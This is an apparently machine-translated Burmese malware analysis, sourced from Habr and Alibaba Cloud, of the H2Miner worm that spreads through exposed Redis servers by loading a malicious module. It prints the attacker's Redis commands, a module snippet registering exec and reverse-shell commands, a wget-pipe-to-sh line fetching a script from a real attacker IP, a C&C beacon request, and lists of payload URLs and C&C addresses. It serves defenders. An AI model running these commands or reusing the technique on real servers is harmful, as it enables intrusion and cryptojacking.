လွန်ခဲ့သောတစ်ရက်က၊ ကျွန်ုပ်၏ပရောဂျက်၏ဆာဗာများထဲမှတစ်ခုသည် အလားတူ worm မှတိုက်ခိုက်ခံခဲ့ရသည်။ "ဒါကဘာလဲ" ဆိုတဲ့မေးခွန်းရဲ့အဖြေကိုရှာဖွေပါ။ Alibaba Cloud Security အဖွဲ့မှ ကောင်းမွန်သော ဆောင်းပါးတစ်ပုဒ်ကို ကျွန်ုပ်တွေ့ရှိခဲ့သည်။ Habre တွင် ဤဆောင်းပါးကို ရှာမတွေ့သောကြောင့်၊ သင့်အတွက် အထူးသဖြင့် ၎င်းကို ဘာသာပြန်ရန် ဆုံးဖြတ်ခဲ့သည် <3
entry ကို
မကြာသေးမီက Alibaba Cloud ၏ လုံခြုံရေးအဖွဲ့သည် H2Miner ရုတ်တရက်ဖြစ်ပွားမှုကို တွေ့ရှိခဲ့သည်။ ဤအန္တရာယ်ရှိသော worm အမျိုးအစားသည် Redis အတွက် တရားဝင်ခွင့်ပြုချက်မရှိခြင်း သို့မဟုတ် အားနည်းသောစကားဝှက်များကို သင့်စနစ်များသို့ဝင်ပေါက်များအဖြစ် အသုံးပြုပြီး၊ ထို့နောက်တွင် ၎င်းသည် ၎င်း၏ကိုယ်ပိုင်အန္တရာယ်ရှိသော module ကိုကျွန်နှင့် master-slave synchronization မှတဆင့်ကျွန်နှင့်ထပ်တူပြုပြီး နောက်ဆုံးတွင် ဤအန္တရာယ်ရှိသော module ကိုတိုက်ခိုက်ခံရသောစက်သို့ဒေါင်းလုဒ်လုပ်ကာ အန္တရာယ်ရှိသောလုပ်ဆောင်မှုကိုလုပ်ဆောင်သည်။ ညွှန်ကြားချက်များ။
ယခင်က၊ သင်၏စနစ်များပေါ်တွင် တိုက်ခိုက်သူများသည် Redis သို့ဝင်ရောက်ပြီးနောက် သင့်စက်သို့ စာရေးထားသော အလုပ်များ သို့မဟုတ် SSH သော့များပါ၀င်သည့်နည်းလမ်းကို အသုံးပြုပြီး အဓိကအားဖြင့် လုပ်ဆောင်ခဲ့ကြသည်။ ကံကောင်းထောက်မစွာ၊ ခွင့်ပြုချက်ထိန်းချုပ်မှုပြဿနာများ သို့မဟုတ် မတူညီသောစနစ်ဗားရှင်းများကြောင့် ဤနည်းလမ်းကို မကြာခဏအသုံးပြု၍မရပါ။ သို့သော်၊ အန္တရာယ်ရှိသော module တစ်ခုအားတင်ခြင်း၏ဤနည်းလမ်းသည် တိုက်ခိုက်သူ၏အမိန့်များကို တိုက်ရိုက်လုပ်ဆောင်နိုင်သည် သို့မဟုတ် သင့်စနစ်အတွက် အန္တရာယ်ရှိသော shell သို့ဝင်ရောက်ခွင့်ရရှိနိုင်သည်။
အင်တာနက်ပေါ်တွင် လက်ခံထားသော Redis ဆာဗာများ (၁ သန်းနီးပါး) များပြားခြင်းကြောင့်၊ Alibaba Cloud ၏ လုံခြုံရေးအဖွဲ့မှ သုံးစွဲသူများအား Redis အွန်လိုင်းတွင် မမျှဝေရန်နှင့် ၎င်းတို့၏ စကားဝှက်များ၏ အစွမ်းသတ္တိနှင့် ဖောက်ပြန်ခြင်းရှိမရှိ ပုံမှန်စစ်ဆေးရန် အကြံပြုထားသည်။ အမြန်ရွေးချယ်မှု။
H2Miner
H2Miner သည် Hadoop yarn၊ Docker နှင့် Redis remote command execution (RCE) အားနည်းချက်များအပါအဝင် နည်းလမ်းအမျိုးမျိုးဖြင့် သင့်စနစ်ကို ကျူးကျော်နိုင်သည့် Linux-based စနစ်များအတွက် သတ္တုတွင်း botnet တစ်ခုဖြစ်သည်။ botnet သည် သင့်ဒေတာကို မိုင်းခွဲရန်၊ တိုက်ခိုက်မှုကို အလျားလိုက် ချဲ့ထွင်ရန်နှင့် အမိန့်နှင့် ထိန်းချုပ်ရန် (C&C) ဆက်သွယ်ရေးများကို ထိန်းသိမ်းရန် အန္တရာယ်ရှိသော script များနှင့် malware များကို ဒေါင်းလုဒ်လုပ်ခြင်းဖြင့် အလုပ်လုပ်ပါသည်။
Redis RCE
ဤအကြောင်းအရာနှင့်ပတ်သက်သည့် အသိပညာကို ZeroNights 2018 တွင် Pavel Toporkov မှ မျှဝေခဲ့ပါသည်။ ဗားရှင်း 4.0 ပြီးနောက်၊ Redis သည် အသုံးပြုသူများအား သီးခြား Redis အမိန့်ပေးချက်များကို လုပ်ဆောင်ရန်အတွက် C နှင့် စုစည်းထားသော ဖိုင်များကို Redis သို့ သွင်းနိုင်စေမည့် plug-in loading အင်္ဂါရပ်ကို ပံ့ပိုးပေးပါသည်။ ဤလုပ်ဆောင်ချက်သည် အသုံးဝင်သော်လည်း၊ master-slave မုဒ်တွင် ဖိုင်များကို fullresync မုဒ်မှတစ်ဆင့် slave နှင့် ထပ်တူပြုနိုင်သည့် အားနည်းချက်တစ်ခုပါရှိသည်။ အန္တရာယ်ရှိသော ဖိုင်များကို လွှဲပြောင်းရန် တိုက်ခိုက်သူမှ ၎င်းကို အသုံးပြုနိုင်သည်။ လွှဲပြောင်းမှုပြီးသွားသောအခါ၊ တိုက်ခိုက်သူများသည် တိုက်ခိုက်ခံရသော Redis instance တွင် module ကို တင်ကာ မည်သည့် command ကိုမဆို လုပ်ဆောင်သည်။
Malware Worm ခွဲခြမ်းစိတ်ဖြာခြင်း။
မကြာသေးမီက Alibaba Cloud လုံခြုံရေးအဖွဲ့က H2Miner အန္တရာယ်ရှိသော မိုင်းတွင်းအုပ်စု၏ အရွယ်အစားသည် ရုတ်တရက် သိသိသာသာ တိုးလာကြောင်း တွေ့ရှိခဲ့သည်။ ခွဲခြမ်းစိတ်ဖြာမှုအရ တိုက်ခိုက်မှုဖြစ်ပွားခြင်း၏ ယေဘုယျဖြစ်စဉ်မှာ အောက်ပါအတိုင်းဖြစ်သည်။
H2Miner သည် အပြည့်အဝတိုက်ခိုက်ရန်အတွက် RCE Redis ကိုအသုံးပြုသည်။ တိုက်ခိုက်သူများသည် အားနည်းသော စကားဝှက်များဖြင့် အကာအကွယ်မဲ့ Redis ဆာဗာများ သို့မဟုတ် ဆာဗာများကို ဦးစွာ တိုက်ခိုက်သည်။
ပြီးရင် သူတို့ အမိန့်ပေးတယ်။ config set dbfilename red2.so ဖိုင်အမည်ကိုပြောင်းလဲရန်။ ယင်းနောက်၊ တိုက်ခိုက်သူများသည် အမိန့်ကို လုပ်ဆောင်သည်။ slaveof master-slave ကူးယူမှုလက်ခံသူလိပ်စာကို သတ်မှတ်ရန်။
တိုက်ခိုက်ခံရသော Redis စံနမူနာသည် တိုက်ခိုက်သူပိုင်ဆိုင်သည့် အန္တရာယ်ရှိသော Redis နှင့် master-slave ချိတ်ဆက်မှုတစ်ခုကို တည်ဆောက်သောအခါ၊ တိုက်ခိုက်သူသည် ဖိုင်များကို synchronize လုပ်ရန် fullresync command ကိုအသုံးပြု၍ ကူးစက်ထားသော module ကို ပေးပို့သည်။ ထို့နောက် red2.so ဖိုင်ကို တိုက်ခိုက်ခံရသော စက်သို့ ဒေါင်းလုဒ်လုပ်ပါမည်။ ထို့နောက် တိုက်ခိုက်သူများသည် ဤ so ဖိုင်ကို တင်ရန် ./red2.so loading module ကို အသုံးပြုသည်။ မော်ဂျူးသည် တိုက်ခိုက်သူထံမှ ညွှန်ကြားချက်များကို လုပ်ဆောင်နိုင်သည် သို့မဟုတ် တိုက်ခိုက်ခံရသော စက်သို့ ဝင်ရောက်ခွင့်ရရန် ပြောင်းပြန်ချိတ်ဆက်မှု (backdoor) ကို စတင်နိုင်သည်။
if (RedisModule_CreateCommand(ctx, "system.exec",
DoCommand, "readonly", 1, 1, 1) == REDISMODULE_ERR)
return REDISMODULE_ERR;
if (RedisModule_CreateCommand(ctx, "system.rev",
RevShellCommand, "readonly", 1, 1, 1) == REDISMODULE_ERR)
return REDISMODULE_ERR;
ကဲ့သို့သော အန္တရာယ်ရှိသော အမိန့်ကို အကောင်အထည်ဖော်ပြီးနောက် / bin / sh -c wget -q -O-http://195.3.146.118/unk.sh | sh> / dev / null 2> & 1တိုက်ခိုက်သူသည် အရန်ဖိုင်အမည်ကို ပြန်လည်သတ်မှတ်ပြီး သဲလွန်စများကို ရှင်းလင်းရန် စနစ် module ကို လွှင့်တင်မည်ဖြစ်သည်။ သို့သော်၊ red2.so ဖိုင်သည် တိုက်ခိုက်ခံရသောစက်တွင် ကျန်ရှိနေမည်ဖြစ်သည်။ အသုံးပြုသူများသည် ၎င်းတို့၏ Redis ဥပမာ၏ ဖိုဒါတွင် သံသယဖြစ်ဖွယ်ဖိုင်တစ်ခု ရှိနေခြင်းကို အာရုံစိုက်ရန် အကြံပြုအပ်ပါသည်။
အရင်းအမြစ်များကို ခိုးယူရန် အန္တရာယ်ရှိသော လုပ်ငန်းစဉ်အချို့ကို သတ်ပစ်သည့်အပြင်၊ တိုက်ခိုက်သူသည် အန္တရာယ်ရှိသော binary ဖိုင်များကို ဒေါင်းလုဒ်လုပ်ပြီး လုပ်ဆောင်ခြင်းဖြင့် အန္တရာယ်ရှိသော script ကို လိုက်နာခဲ့သည်။ . ဆိုလိုသည်မှာ host တွင် kinsing ပါရှိသော လုပ်ငန်းစဉ်အမည် သို့မဟုတ် လမ်းညွှန်အမည်သည် ထိုစက်ကို ဤဗိုင်းရပ်စ်ပိုး ကူးစက်ခံထားရကြောင်း ဖော်ပြနိုင်သည်။
ပြောင်းပြန်အင်ဂျင်နီယာရလဒ်များအရ malware သည် အောက်ပါလုပ်ဆောင်ချက်များကို အဓိကအားဖြင့် လုပ်ဆောင်သည်-
- ဖိုင်များတင်ခြင်းနှင့် ၎င်းတို့ကို လုပ်ဆောင်ခြင်း
- သတ္တုတွင်း
- C&C ဆက်သွယ်ရေးကို ထိန်းသိမ်းခြင်းနှင့် တိုက်ခိုက်သူ အမိန့်ပေးချက်များကို လုပ်ဆောင်ခြင်း။
သင်၏သြဇာလွှမ်းမိုးမှုကိုချဲ့ထွင်ရန် ပြင်ပစကန်ဖတ်ခြင်းအတွက် Masscan ကိုသုံးပါ။ ထို့အပြင်၊ C&C ဆာဗာ၏ IP လိပ်စာကို ပရိုဂရမ်တွင် hard-code လုပ်ပြီး တိုက်ခိုက်ခံရသော host သည် HTTP တောင်းဆိုချက်များကို အသုံးပြုကာ C&C ဆက်သွယ်မှုဆာဗာနှင့် ဆက်သွယ်မည်ဖြစ်ပြီး၊ HTTP ခေါင်းစီးတွင် ဖုတ်ကောင် (အပေးအယူခံရသောဆာဗာ) အချက်အလက်များကို HTTP ခေါင်းစီးတွင် ဖော်ထုတ်ထားသည်။
GET /h HTTP/1.1
Host: 91.215.169.111
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Arch: amd64
Cores: 2
Mem: 3944
Os: linux
Osname: debian
Osversion: 10.0
Root: false
S: k
Uuid: xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxx
Version: 26
Accept-Encoding: gzip
အခြားတိုက်ခိုက်ရေးနည်းလမ်းများ
တီကောင်အသုံးပြုသော လိပ်စာများနှင့် လင့်ခ်များ
/ အမျိုးအနွယ်
• 142.44.191.122/t.sh
• 185.92.74.42/h.sh
• 142.44.191.122/spr.sh
• 142.44.191.122/spre.sh
• 195.3.146.118/unk.sh
s&c
• 45.10.88.102
• 91.215.169.111
• 139.99.50.255
• 46.243.253.167
• 195.123.220.193
ကောင်စီ
ပထမဦးစွာ Redis ကိုအင်တာနက်မှဝင်ရောက်၍မရနိုင်ပါ၊ ခိုင်မာသောစကားဝှက်ဖြင့်ကာကွယ်ထားသင့်သည်။ Redis directory တွင် red2.so ဖိုင်မရှိကြောင်းနှင့် host ရှိ file/process name တွင် "kinsing" မရှိကြောင်းကိုလည်း client များက စစ်ဆေးရန် အရေးကြီးပါသည်။
source: www.habr.com